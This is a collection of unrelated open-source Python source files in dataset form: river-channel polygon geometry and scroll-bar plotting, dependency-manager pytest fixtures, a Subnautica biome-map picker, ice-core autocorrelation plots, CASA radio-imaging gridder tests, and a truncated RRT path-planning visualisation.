inputs:\n cropped_polys - list of polygons that describe the channel\n cropped_polys_new - list of new polygons that do not overlap\n i1 - index of starting point of segment with overlapping polygons\n i2 - index of ending point of segment with overlapping polygons\n pad - number of polygons you want the segment to be padded with\n new_poly_inds - indices of fixed polygons\n x - \n y - \n outputs:\n bend - polygon that describes the fixed segment\n x1 - new x coordinates of 
the (fixed) left bank\n x2 - new x coordinates of the (fixed) right bank\n y1 - new y coordinates of the (fixed) left bank\n y2 - new y coordinates of the (fixed) right bank\n \"\"\"\n \n # bend = cropped_polys[i1-pad] # start bend with first polygon\n # count = 1\n # for poly in cropped_polys[i1-pad+1:i2+pad]: # add all the polygons to the bend\n # bend = bend.union(poly)\n # count = count+1\n\n bend = unary_union(cropped_polys[i1-pad:i2+pad])\n count = len(cropped_polys[i1-pad:i2+pad])\n\n eps = 0.1 # this is needed to get rid of 'sliver geometries' \n bend = bend.buffer(eps, 1, join_style=2).buffer(-eps, 1, join_style=2)\n \n xbend = bend.exterior.xy[0] # x coordinates of polygon that describes the bend\n ybend = bend.exterior.xy[1] # y coordinates of polygon that describes the bend\n dx, dy, ds, s = compute_s_coord(xbend,ybend) # get distances between consecutive points\n \n if len(np.where(np.abs(ds)>crit_dist)[0])==2: # if 'xbend' starts at a 'corner' point of the bend\n ind1,ind2 = np.where(np.abs(ds)>crit_dist)[0]\n else: # if 'xbend' does not start at a 'corner' point of the bend\n ind1,ind2,ind3 = np.where(np.abs(ds)>crit_dist)[0] \n # ind1, ind2 are the indices where 'xbend' and 'ybend' switch from one bank to the other\n\n # coordinates of the right bank:\n b1_rbx = np.hstack((xbend[ind2+1:],xbend[1:ind1+1]))\n b1_rby = np.hstack((ybend[ind2+1:],ybend[1:ind1+1]))\n\n # coordinates of the left bank:\n b1_lbx = xbend[ind1+1:ind2+1]\n b1_lby = ybend[ind1+1:ind2+1]\n\n # resample left bank:\n tck, u = scipy.interpolate.splprep([b1_lbx,b1_lby],s=1) # parametric spline representation of curve\n unew = np.linspace(0,1,count+1) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n b1_lbxs = out[0]\n b1_lbys = out[1]\n\n # resample right bank:\n tck, u = scipy.interpolate.splprep([b1_rbx,b1_rby],s=1) # parametric spline representation of curve\n unew = np.linspace(0,1,count+1) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n b1_rbxs = out[0]\n b1_rbys = out[1]\n\n direction_flag = 0 # if direction of banks is same as that of flow\n x1 = b1_lbxs\n x2 = b1_rbxs[::-1]\n y1 = b1_lbys\n y2 = b1_rbys[::-1]\n \n dx1 = x1[-1]-x1[0]\n dy1 = y1[-1]-y1[0]\n dx = x[i2]-x[i1]\n dy = y[i2]-y[i1]\n \n # if direction of banks is flipped relative to flow, the coordinate arrays need to be flipped:\n if np.sign(dy1) != np.sign(dy):\n direction_flag = 1\n x1 = x1[::-1]\n x2 = x2[::-1]\n y1 = y1[::-1]\n y2 = y2[::-1]\n\n new_polys = [] # create new polygons for the bend\n for i in range(0,len(b1_lbxs)-1):\n if direction_flag == 0: # direction of banks is same as that of flow\n poly = Polygon(LinearRing([[x1[i+1],y1[i+1]],[x2[i+1],y2[i+1]],[x2[i],y2[i]],[x1[i],y1[i]]]))\n else: # direction of banks is flipped relative to flow\n poly = Polygon(LinearRing([[x2[i+1],y2[i+1]],[x1[i+1],y1[i+1]],[x1[i],y1[i]],[x2[i],y2[i]]]))\n new_polys.append(poly)\n\n # plot bend and new bend polygons:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for poly in cropped_polys[i1-pad+1:i2+pad]:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='b'))\n for poly in new_polys:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='r'))\n plt.axis('equal');\n \n plt.plot(xbend,ybend,'k.')\n plt.plot(xbend[ind1],ybend[ind1],'ro')\n plt.plot(xbend[ind2],ybend[ind2],'bo')\n if len(np.where(np.abs(ds)>100)[0])>2:\n plt.plot(xbend[ind3],ybend[ind3],'go')\n \n count = 0\n for i in np.arange(i1-pad,i2+pad):\n cropped_polys_new[i] = new_polys[i-(i1-pad)]\n 
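# record the index of each fixed polygon in new_poly_inds (modified in place)\n        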
new_poly_inds.append(i)\n count = count+1\n \n return bend, x1, x2, y1, y2\n\ndef simplify_polygon(poly, deltas):\n x1 = np.array(poly.exterior.xy[0])\n y1 = np.array(poly.exterior.xy[1])\n dx, dy, ds, s = compute_s_coord(x1,y1)\n ds_inds = np.where(ds>4*deltas)[0]\n corner_inds = np.sort(np.hstack((ds_inds,ds_inds+1)))\n x1 = x1[corner_inds]\n y1 = y1[corner_inds]\n dx, dy, ds, s = compute_s_coord(x1,y1)\n while len(np.where(ds==0)[0])>0: # eliminate duplicate points\n zero_ind = np.where(ds==0)[0][0]\n x1 = np.hstack((x1[:zero_ind], x1[zero_ind+1:]))\n y1 = np.hstack((y1[:zero_ind], y1[zero_ind+1:]))\n dx, dy, ds, s = compute_s_coord(x1,y1)\n poly = Polygon(LinearRing(np.vstack((x1,y1)).T))\n return poly\n\ndef simplify_all_polygons(polys, deltas):\n for i in range(len(polys)):\n poly = polys[i]\n if type(poly)==Polygon:\n if len(poly.exterior.xy[0])>5: # if polygon has more than 4 points\n polys[i] = simplify_polygon(poly, deltas=deltas)\n return polys\n\ndef create_new_bank_coordinates(cropped_polys_new, x, y):\n ds = [] # \n for ind in range(len(cropped_polys_new)):\n poly = cropped_polys_new[ind]\n poly = orient(poly,sign=-1.0)\n x1 = np.array(poly.exterior.xy[0])[0]\n y1 = np.array(poly.exterior.xy[1])[0]\n d = (x1-x[ind])*(y[ind+1]-y[ind])-(y1-y[ind])*(x[ind+1]-x[ind])\n ds.append(d)\n # create new x and y coordinate arrays for the banks\n rbxn = []\n rbyn = []\n lbxn = []\n lbyn = []\n # start with first two points on first polygon:\n poly = cropped_polys_new[0]\n if ds[0]<0:\n rbxn.append(poly.exterior.xy[0][3])\n rbyn.append(poly.exterior.xy[1][3])\n lbxn.append(poly.exterior.xy[0][2])\n lbyn.append(poly.exterior.xy[1][2])\n else:\n rbxn.append(poly.exterior.xy[0][1])\n rbyn.append(poly.exterior.xy[1][1])\n lbxn.append(poly.exterior.xy[0][0])\n lbyn.append(poly.exterior.xy[1][0])\n # then add the rest:\n for i in range(len(cropped_polys_new)):\n poly = cropped_polys_new[i]\n if type(poly)==Polygon:\n poly = orient(poly,sign=-1.0)\n if ds[i]<0:\n rbxn.append(poly.exterior.xy[0][0])\n rbyn.append(poly.exterior.xy[1][0])\n lbxn.append(poly.exterior.xy[0][1])\n lbyn.append(poly.exterior.xy[1][1])\n else:\n rbxn.append(poly.exterior.xy[0][2])\n rbyn.append(poly.exterior.xy[1][2])\n lbxn.append(poly.exterior.xy[0][3])\n lbyn.append(poly.exterior.xy[1][3])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(x,y,'b.-')\n for i in range(len(cropped_polys_new)):\n if type(cropped_polys_new[i])==Polygon:\n ax.add_patch(PolygonPatch(cropped_polys_new[i],facecolor='none',edgecolor='k'))\n plt.plot(rbxn,rbyn,'.-')\n plt.plot(lbxn,lbyn,'.-')\n plt.axis('equal');\n return rbxn, rbyn, lbxn, lbyn\n\ndef get_bti_polys(dates, dirname, ts1, ts2, deltas, W, kl):\n # fw = 'fake width' needed to create wide channel segments\n # read the centerline shapefiles for two timesteps\n date1 = dates[ts1]\n date2 = dates[ts2]\n filename1 = dirname + 'cline_'+date1[:4]\n filename2 = dirname + 'cline_'+date2[:4]\n sf1 = shapefile.Reader(filename1).shapes()\n cl1 = np.array(sf1[0].points)\n sf2 = shapefile.Reader(filename2).shapes()\n cl2 = np.array(sf2[0].points)\n \n x = cl1[:,0]\n y = cl1[:,1]\n xn = cl2[:,0]\n yn = cl2[:,1]\n\n curv, s = compute_curvature(x, y)\n curv = savgol_filter(curv,71,3)\n\n age1 = convert_string_to_date(date1)\n age2 = convert_string_to_date(date2)\n d = age2-age1\n years = d.days/365.0\n migr_rate, migr_sign, p, q = get_migr_rate(x, xn, y, yn, years)\n migr_rate = medfilt(savgol_filter(migr_rate,51,3),kernel_size=5) \n\n f = 0.5\n filename = dirname + 'polys_'+date1[:4]\n sf = 
shapefile.Reader(filename).shapes()\n    polys = []\n    for i in range(0,len(sf)):\n        poly = np.array(sf[i].points)\n        x0 = poly[0,0]; y0 = poly[0,1]; x1 = poly[1,0]; y1 = poly[1,1];\n        x2 = poly[2,0]; y2 = poly[2,1]; x3 = poly[3,0]; y3 = poly[3,1];\n        xa = (1+f)*x0 - f*x1\n        ya = (1+f)*y0 - f*y1\n        xb = (1+f)*x1 - f*x0\n        yb = (1+f)*y1 - f*y0\n        xc = (1+f)*x3 - f*x2\n        yc = (1+f)*y3 - f*y2\n        xd = (1+f)*x2 - f*x3\n        yd = (1+f)*y2 - f*y3\n        poly = Polygon(LinearRing([[xa,ya],[xb,yb],[xd,yd],[xc,yc]]))\n        polys.append(poly)\n\n    bti = W*curv*migr_rate/kl\n    return x, xn, y, yn, polys, bti, curv, migr_rate, s\n\nimport seaborn as sns # used for the scroll-bar fill colors below; this import was missing from the module header\n\nclass Bar:\n    def __init__(self,age,scrolls):\n        self.age = age\n        self.scrolls = scrolls\n    def plot(self,ax):\n        for scroll in self.scrolls:\n            ax.add_patch(PolygonPatch(scroll.polygon,edgecolor='k',facecolor=sns.xkcd_rgb[\"light gold\"]))\n        plt.axis('equal')\n    def plot_bti(self,ax,vmin,vmax,cmap,linewidth,edgecolor):\n        for scroll in self.scrolls:\n            scroll.plot_bti(ax,vmin,vmax,cmap,linewidth,edgecolor)\n        \nclass Scroll:\n    def __init__(self,polygon,age,bti_polys):\n        self.polygon = polygon\n        self.age = age\n        self.bti_polys = bti_polys\n        self.area = self.polygon.area\n    def plot(self,ax):\n        ax.add_patch(PolygonPatch(self.polygon,edgecolor='k',facecolor=sns.xkcd_rgb[\"light gold\"]))\n    def plot_bti(self,ax,vmin,vmax,cmap,linewidth,edgecolor):\n        norm = mpl.colors.Normalize(vmin=vmin,vmax=vmax)\n        m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)\n        for i in range(len(self.bti_polys)):\n            ax.add_patch(PolygonPatch(self.bti_polys[i].polygon,\n                        facecolor=m.to_rgba(self.bti_polys[i].bti),edgecolor=edgecolor,linewidth=linewidth))\n        \nclass BTI_poly:\n    def __init__(self,polygon,bti):\n        self.polygon = polygon\n        self.bti = bti\n        self.area = self.polygon.area\n    \ndef get_rid_of_self_intersections(poly):\n    ext = poly.exterior\n    mls = ext.intersection(ext)\n    polygons = polygonize(mls)\n    return polygons\n\ndef create_bti_polys(scroll,polys,bti):\n    sel_polys = [] # polygons that intersect the scroll of interest\n    btis = [] # bti values that go with the polygons of interest\n    for i in range(len(polys)):\n        if polys[i].intersects(scroll):\n            sel_polys.append(polys[i])\n            btis.append(bti[i+1])\n    # some polygons have self-intersections that need to be removed:\n    sel_polys_fixed = []\n    for poly in sel_polys:\n        if poly.is_valid: # if there are no self-intersections, the polygon is already 'fixed'\n            sel_polys_fixed.append(poly)\n        else: # if there are self-intersections:\n            fixed_polys = get_rid_of_self_intersections(poly)\n            fixed_polys1 = [] # 'fixed_polys' is a generator, but we need a list\n            for fpoly in fixed_polys:\n                fixed_polys1.append(fpoly)\n            # select the larger polygon:\n            if fixed_polys1[0].area>fixed_polys1[1].area:\n                sel_polys_fixed.append(fixed_polys1[0])\n            else:\n                sel_polys_fixed.append(fixed_polys1[1])\n    sel_polys = sel_polys_fixed\n    # now we are ready to clip the larger polygons in 'sel_polys' to the extent of the scroll:\n    bti_polys = []\n    for i in range(len(sel_polys)):\n        poly = scroll.intersection(sel_polys[i])\n        if type(poly)==Polygon:\n            bti_polys.append(poly)\n    return bti_polys, btis\n\ndef create_bar_hierarchy(bars, cutoffs, dates, all_polys, all_btis):\n    scrolls = [] # list of all scroll bar polygons\n    ages = []\n    areas = []\n    eroded_cutoffs = []\n    cutoff_ages = []\n    for i in range(len(bars)):\n        for j in range(len(bars[i])): # bars in time step i\n            # if bar does not intersect any of the cutoffs and is larger than 1 square meter:\n            if (not bars[i][j].intersects(MultiPolygon(cutoffs[i]))) & 
(bars[i][j].area>1.0):\n scrolls.append(bars[i][j]) # append bar to list of scrolls\n ages.append(dates[i+1]) # append age of bar to list of ages\n areas.append(bars[i][j].area) # append area of bar to list of areas\n # if bar intersects any of the cutoffs and is larger than 1 square meter:\n elif (bars[i][j].intersects(MultiPolygon(cutoffs[i]))) & (bars[i][j].area>1.0):\n eroded_cutoffs.append(bars[i][j]) # append 'bar' to list of eroded cutoffs \n cutoff_ages.append(dates[i+1]) # append age of 'bar' to list of ages of eroded cutoffs\n Bars = [] # list of bars\n for i in trange(len(bars)):\n age = dates[i+1]\n inds = np.where(np.array(ages)==age)[0]\n scroll_objects = []\n scrolls_same_age = []\n for ind in inds:\n if scrolls[ind].area>1.0:\n scrolls_same_age.append(scrolls[ind])\n for scroll in scrolls_same_age:\n bti_polys, btis = create_bti_polys(scroll, all_polys[i], all_btis[i])\n bti_poly_objects = []\n for j in range(len(bti_polys)):\n bti_poly = BTI_poly(bti_polys[j], btis[j]) # create BTI_poly object\n bti_poly_objects.append(bti_poly)\n scroll_object = Scroll(scroll, age, bti_poly_objects) # create Scroll object\n scroll_objects.append(scroll_object)\n bar = Bar(age, scroll_objects) # create Bar object\n Bars.append(bar) # add bar to the list of bars\n bti_ages = []\n bti_areas = []\n bti_polys = []\n bti_indices = []\n for bar in Bars:\n for scroll in bar.scrolls:\n for bti_poly in scroll.bti_polys:\n bti_ages.append(scroll.age)\n bti_areas.append(bti_poly.area)\n bti_polys.append(bti_poly.polygon)\n bti_indices.append(bti_poly.bti)\n return Bars, bti_ages, bti_areas, bti_polys, bti_indices\n\ndef plot_scroll_bars(bars, cutoffs, dates):\n \"\"\"function for plotting scroll bars colored by age\n :param bars:\n :param cutoffs:\n :param dates:\n \"\"\"\n fig = plt.figure()\n ax = plt.subplot(111)\n cmap = mpl.cm.get_cmap('viridis')\n for i in trange(len(dates)-1):\n color = cmap(i/float(len(dates)-1))\n for b in bars[i]:\n if MultiPolygon(cutoffs[i]).is_valid: # sometimes this is invalid\n if not b.intersects(MultiPolygon(cutoffs[i])):\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n else:\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n plt.axis('equal');\n return fig\n\ndef plot_btis(Bars, lw = 0.1, vmin = -1, vmax = 1):\n \"\"\"function for plotting bar type indices on a map\n\n :param Bars: name of the well (usually this is the UWI)\n :param lw: linewidth to be used when plotting BTI polygons (default is 0.1)\n :param vmin: minimum value for BTI colormap (default is -1.0)\n :param vmax: maximum value for BTI colormap (default is 1.0)\"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes([0.05, 0.05, 0.9, 0.9]) # [left, bottom, width, height]\n # ax = fig.add_subplot(111)\n norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)\n cmap = mpl.cm.RdBu_r\n m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)\n for Bar in tqdm(Bars):\n for scroll in Bar.scrolls:\n for bti_poly in scroll.bti_polys:\n if bti_poly.polygon.area > 1.0:\n ax.add_patch(PolygonPatch(bti_poly.polygon, facecolor=m.to_rgba(bti_poly.bti), linewidth=lw))\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cax, orientation='vertical', label='bar type index')\n ax.plot(bti_poly.polygon.exterior.xy[0], bti_poly.polygon.exterior.xy[1], color = 'k', linewidth=lw)\n ax.set_aspect('equal')\n return 
fig","repo_name":"zsylvester/channelmapper","sub_path":"channelmapper.py","file_name":"channelmapper.py","file_ext":"py","file_size_in_byte":32345,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"} +{"seq_id":"71979239441","text":"try:\n from importlib.resources import path\n\nexcept ImportError:\n from importlib_resources import path # type: ignore\n\nimport pytest\nfrom path import Path\n\nfrom dependencmake.dependency_list import DependencyList\n\n\n@pytest.fixture\ndef temp_directory(tmp_path):\n return Path(tmp_path)\n\n\n@pytest.fixture\ndef subdependencies_temp_directory(temp_directory):\n with path(\"tests.resources.subdependencies\", \"dependencmake.yaml\") as config:\n Path(config).copy(temp_directory)\n\n fetch_directory = (temp_directory / \"dependencmake\" / \"fetch\").makedirs_p()\n (fetch_directory / \"dep11_1d264692d45516dcae4a8f07a847d742\").mkdir_p()\n (fetch_directory / \"dep12_fe8ba562a3f2c89af885e5036f465d4b\").mkdir_p()\n dep1 = (fetch_directory / \"dep1_36e47005e2edb6e84fdb0e2e411bff5a\").mkdir_p()\n (fetch_directory / \"dep21_d1efc308c741bb9421611de57b61aec2\").mkdir_p()\n dep2 = (fetch_directory / \"dep2_4b35bd592421ea9170dfb690d7550744\").mkdir_p()\n\n resource = \"tests.resources.subdependencies.dependencmake.fetch\"\n\n with path(\n f\"{resource}.dep1_36e47005e2edb6e84fdb0e2e411bff5a\",\n \"dependencmake.yaml\",\n ) as config:\n Path(config).copy(dep1)\n\n with path(\n f\"{resource}.dep2_4b35bd592421ea9170dfb690d7550744\",\n \"dependencmake.yaml\",\n ) as config:\n Path(config).copy(dep2)\n\n return temp_directory\n\n\nclass TestDependencyList:\n def test_create_subdependencies(self, subdependencies_temp_directory):\n \"\"\"Create supdependencies.\"\"\"\n with subdependencies_temp_directory:\n dependency_list = DependencyList()\n dependency_list.create_dependencies(subdependencies_temp_directory)\n dependency_list.create_subdependencies()\n\n assert len(dependency_list.dependencies) == 5\n assert dependency_list.dependencies[0].name == \"Dep11\"\n assert dependency_list.dependencies[1].name == \"Dep12\"\n assert dependency_list.dependencies[2].name == \"Dep1\"\n assert dependency_list.dependencies[3].name == \"Dep21\"\n assert dependency_list.dependencies[4].name == \"Dep2\"\n\n def test_fetch_subdependencies(self, mocker, subdependencies_temp_directory):\n \"\"\"Fetch supdependencies.\"\"\"\n mocker.patch(\"dependencmake.dependency.urlretrieve\")\n mocker.patch(\"dependencmake.dependency.unpack_archive\")\n mocked_get_project_data = mocker.patch(\n \"dependencmake.dependency.get_project_data\"\n )\n mocked_get_project_data.return_value = {\"name\": \"Dep\", \"version\": \"1.0.0\"}\n\n with subdependencies_temp_directory:\n dependency_list = DependencyList()\n dependency_list.create_dependencies(subdependencies_temp_directory)\n dependency_list.create_subdependencies()\n dependency_list.fetch()\n","repo_name":"pzehner/dependencmake","sub_path":"tests/test_dependency_list_integration.py","file_name":"test_dependency_list_integration.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1206863766","text":"import pygame\n\nmap_img = pygame.image.load(\"map.png\")\nmap_img = pygame.transform.scale(map_img, (480, 480))\n\npygame.display.set_caption(\"Subnautica Map Tracker\")\n\ndef rgb_to_biome(rgb):\n if rgb == (117, 134, 142):\n return \"Safe Shallows\"\n elif rgb == (175, 225, 126):\n return \"Kelp Forest\"\n elif 
rgb == (202, 70, 101):\n return \"Grassy Plateaus\"\n elif rgb == (55, 79, 168):\n return \"Mushroom Forest\"\n elif rgb == (158, 144, 213):\n return \"Bulb Zone\"\n elif rgb == (184, 119, 93):\n return \"Underwater Islands\"\n elif rgb == (42, 49, 51):\n return \"Mountains\"\n elif rgb == (225, 82, 255):\n return \"Northern Blood Kelp Zone\"\n elif rgb == (246, 229, 169):\n return \"Dunes\"\n elif rgb == (126, 90, 90):\n return \"Crash Zone\"\n elif rgb == (123, 160, 188):\n return \"Sea Treader's Path\"\n elif rgb == (62, 100, 77):\n return \"Sparse Reef\"\n elif rgb == (90, 21, 0):\n return \"Crag Field\"\n elif rgb == (131, 59, 110):\n return \"Blood Kelp Zone Trench\"\n elif rgb == (70, 146, 187):\n return \"Grand Reef\"\n elif rgb == (0, 0, 0):\n return \"Void\"\n elif rgb == (0, 255, 0):\n return rgb_to_biome(selected)\n else:\n return \"Unknown\"\n\nselected = None\n\npygame.init()\n\ndisplay = pygame.display.set_mode((480, 480))\n\nwhile True:\n display.blit(map_img, (0, 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n color = display.get_at(pygame.mouse.get_pos())[:3]\n\n print(f\"Biome: {rgb_to_biome(color)}\")\n\n pixels = pygame.PixelArray(map_img)\n\n if selected:\n pixels.replace((0, 255, 0), selected)\n\n pixels.replace(color, (0, 255, 0))\n del pixels\n\n selected = color\n\n pygame.display.update()","repo_name":"SolarWindss/Python","sub_path":"TOOLS/FORMAL/Subnautica Map Tracker/V1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18933162070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nIce core ACF\nCreated on Wed May 19 14:05:10 2021\n\n@author: lizz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nfrom statsmodels.graphics import tsaplots\n\n\n## Read in Greenland time series\ncore_accum_fpath = '/Users/lizz/Documents/GitHub/Data_unsynced/Ice_core_accum/Andersen_etal_2006_Annual_Accumulation_22Mar2011-trimmed.csv'\n\ncore_tseries = pd.read_csv(core_accum_fpath, index_col=0, parse_dates=[0])\ncore_names = core_tseries.columns\n\nseries_to_test = core_tseries\ncore_to_test = core_names[3]\n\n## Pre-process data\nanomaly_series = series_to_test - series_to_test.mean()\n\ntest_series = anomaly_series[core_to_test][~np.isnan(anomaly_series[core_to_test])]\n\nfig, ax = plt.subplots()\ntsaplots.plot_acf(test_series, ax=ax, lags=100, zero=False)\nax.set(xlabel='Lag [yr]', ylabel='Autocorr.', title='{} Core'.format(core_to_test.split()[0]))\nplt.show()\n\n## Plot all 5 cores together\nfig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(5, figsize=(10, 12), \n sharex=True, sharey=True, tight_layout=True)\nfor c, ax in zip(core_names, (ax1,ax2,ax3,ax4,ax5)):\n try:\n ts = anomaly_series[c][~np.isnan(anomaly_series[c])]\n tsaplots.plot_pacf(ts, ax=ax, lags=100, zero=False)\n ax.set(ylabel='Partial acorr.', title='{} Core'.format(c.split()[0]))\n except:\n continue\nax5.set(xlabel='Lag [yr]')\n\n## Plot 4 cores together - 500 years. 
Milcent not long enough\nfig, (ax6, ax7, ax8, ax9) = plt.subplots(4, figsize=(10, 12), \n                               sharex=True, sharey=True, tight_layout=True)\nfor c, ax in zip((name for name in core_names if 'Milcent' not in name), \n                 (ax6,ax7,ax8,ax9)):\n    try:\n        ts = anomaly_series[c][~np.isnan(anomaly_series[c])]\n        tsaplots.plot_pacf(ts, ax=ax, lags=500, zero=False)\n        ax.set(ylabel='Partial acorr.', title='{} Core'.format(c.split()[0]))\n    except:\n        continue\nax9.set(xlabel='Lag [yr]')\n\n## Plot with a different coloring when significant\nfig, ax = plt.subplots(figsize=(10,5))\ntsaplots.plot_pacf(test_series, ax=ax, lags=100, zero=False)\nax.set(xlabel='Lag [yr]', ylabel='Autocorr.', title='{} Core'.format(core_to_test.split()[0]))\nplt.show()\n","repo_name":"ehultee/stoch-SMB","sub_path":"processing-archive/icecore-ACF.py","file_name":"icecore-ACF.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"25753732462","text":"\"\"\"\nimaging tests: what gridders do what to the data?\n\"\"\"\nimport os\n#import runpy\n#runpy.run_path('continuum_imaging_general.py')\nimport pyregion\nimport numpy as np\nimport sys\nassert os.getenv('SCRIPT_DIR') is not None\nsys.path.append(os.getenv('SCRIPT_DIR'))\nfrom continuum_imaging_general import myclean, makefits\nfrom continuum_windows import Qmses\n\nfrom astropy.io import fits\nfrom astropy import wcs\n\nfrom taskinit import msmdtool, iatool, casalog, tbtool\n\nfrom tclean_cli import tclean_cli as tclean\nfrom flagdata_cli import flagdata_cli as flagdata\nfrom ft_cli import ft_cli as ft\nfrom gaincal_cli import gaincal_cli as gaincal\nfrom applycal_cli import applycal_cli as applycal\nfrom concat_cli import concat_cli as concat\nfrom importfits_cli import importfits_cli as importfits\nfrom imhead_cli import imhead_cli as imhead\nfrom makemask_cli import makemask_cli as makemask\nfrom exportfits_cli import exportfits_cli as exportfits\nfrom importfits_cli import importfits_cli as importfits\nfrom clearcal_cli import clearcal_cli as clearcal\nfrom split_cli import split_cli as split\nia = iatool()\nmsmd = msmdtool()\ntb = tbtool()\n\n\ndef myprint(x):\n    print(x)\n    casalog.post(str(x), origin='singlefield')\n\n\nmses = list(Qmses.keys())\n\n\nfullpath_mses = ['../' + ms[:-3] + \"_continuum_split_for_selfcal.ms\"\n                 for ms in mses if ms in Qmses]\n\ncont_vis = []\nfor ms in fullpath_mses:\n    splitagain = ms[:-3] + \"_SgrB2_NM_Q.ms\"\n    myprint(\"{0} -> {1}\".format(ms, splitagain))\n    if not os.path.exists(splitagain):\n        assert split(vis=ms, outputvis=splitagain,\n                     field='Sgr B2 NM Q',\n                     datacolumn='corrected')\n    cont_vis.append(splitagain)\n\n\n\ncleanbox_mask_image = 'cleanbox_mask_SgrB2.image'\ncleanbox_mask = 'cleanbox_mask.mask'\nmask = cleanbox_mask_image\n\n\nselfcal_fields = \"Sgr B2 N Q,Sgr B2 NM Q,Sgr B2 MS Q\".split(\",\")\nselfcal_fields = ['Sgr B2 NM Q']\n\n\nextrapars = {'wproject': {'wprojplanes': 64,\n                          #'rotatepastep': 5.0,\n                          #'cfcache':'test_wtermmerge.cfcache',\n                          #'conjbeams':True,\n                          #'wbawp':True,\n                          },\n             'mosaic': {},\n             'standard': {},\n             'widefield': {},\n             'awproject': {'wprojplanes': 64,\n                           'rotatepastep': 5.0,\n                           'cfcache':'test_awtermmerge.cfcache',\n                           'conjbeams':True,\n                           'wbawp':True,\n                           },\n             }\n\nfor gridder in ('standard', 'wproject', 'widefield', 'mosaic', 'awproject'):\n\n    try:\n        imagename = '18A-229_Q_singlefield_imaging_smallfield_test_{0}'.format(gridder)\n        myclean(vis=cont_vis,\n                fields=selfcal_fields,\n                spws='',\n                imsize=1000,\n                phasecenters={\"Sgr B2 N 
Q\":'J2000 17h47m19.897 -28d22m17.340',\n \"Sgr B2 NM Q\":'J2000 17h47m20.166 -28d23m04.968',\n \"Sgr B2 MS Q\":'J2000 17h47m20.166 -28d23m04.968',\n \"Sgr B2 S Q\":'J2000 17h47m20.461 -28d23m45.059',\n },\n cell='0.01arcsec',\n name=imagename,\n gridder=gridder,\n niter=10000,\n threshold='0.5mJy',\n scales=[0,3,9],\n robust=0.5,\n savemodel='none',\n mask=mask,\n noneg=False,\n **extrapars[gridder]\n )\n except Exception as ex:\n myprint(ex)\n\nfor gridder in ('standard', 'wproject', 'widefield', 'mosaic', 'awproject'):\n\n imagename = '18A-229_Q_singlefield_imaging_largefield_test_{0}'.format(gridder)\n try:\n myclean(vis=cont_vis,\n fields=selfcal_fields,\n spws='',\n imsize=4000,\n cell='0.01arcsec',\n name=imagename,\n gridder=gridder,\n niter=10000,\n threshold='1mJy',\n scales=[0,3,9],\n robust=0.5,\n savemodel='none',\n mask=mask,\n noneg=False,\n **extrapars[gridder]\n )\n except Exception as ex:\n myprint(ex)\n","repo_name":"keflavich/SgrB2_VLA_18A-229","sub_path":"reduction/singlefield_imaging_tests.py","file_name":"singlefield_imaging_tests.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33464630840","text":"import pygame\nimport random\nimport time\nfrom Node import *\nfrom Obstacle import obstacle\nfrom RRT import *\nfrom visulization import visualization\nimport time\n\ndef up():\n vis.update()\n\nif __name__ == \"__main__\":\n \n running = True\n\n #simulations setup\n scale = 7\n obstalce_list = [\n obstacle([(20,20),(20,40),(80,40),(80,20)]),\n obstacle([(20,20+30),(20,40+30),(80,40+30),(80,20+30)]),\n obstacle([(90,30),(90,80),(100,80),(100,30)])\n ]\n cardV = 1\n eta = 2\n acc = 10\n n = 2000\n root = Node(0,0)\n target = (115,95)\n size = (125,100)\n eta = 3\n printed = False\n #create the visualization \n vis = visualization(size,root,target_ = target, accuracy_ = acc, obstacles_ = obstalce_list, scale_ = 4)\n \n xNewNode = root\n \n gammaRRT = getGammaRRT(3,obstalce_list,size)\n pathsEnds =[]\n path = []\n minPathNode = Node(1,1)\n iterations = 0\n start_time = time.time()\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n #main loop\n iterations +=1\n if(iterations <n):\n xRand = SampleFree(obstalce_list,size)\n xNearest = Nearest(root,xRand)\n xNew = steer(xNearest,xRand,eta)\n if obstacleFree(xNearest,xNew,obstalce_list):\n cMin = 0\n xNewNode = Node(xNew[0],xNew[1])\n ##need to add Card(V)\n #NearPoints = Near(root,xNew,min(eta,gammaRRT*((cardV/(2**cardV))**(1/2))))\n NearPoints = Near(root,xNew,eta)\n xMin = xNearest \n cMin = Cost(xNearest)+ CostOfEdge(xNearest,xNewNode)\n for xNear in NearPoints:\n if(collisionFree(xNear,xNew,obstalce_list)and Cost(xNear) + CostOfEdge(xNear,xNewNode)<cMin):\n xMin = xNear\n cMin = Cost(xNear) + CostOfEdge(xNear,xNewNode)\n xMin.addChild(xNewNode)\n cardV +=1\n for xNear in NearPoints:\n if collisionFree(xNear,(xNewNode.x,xNewNode.y),obstalce_list) and Cost(xNewNode)+ 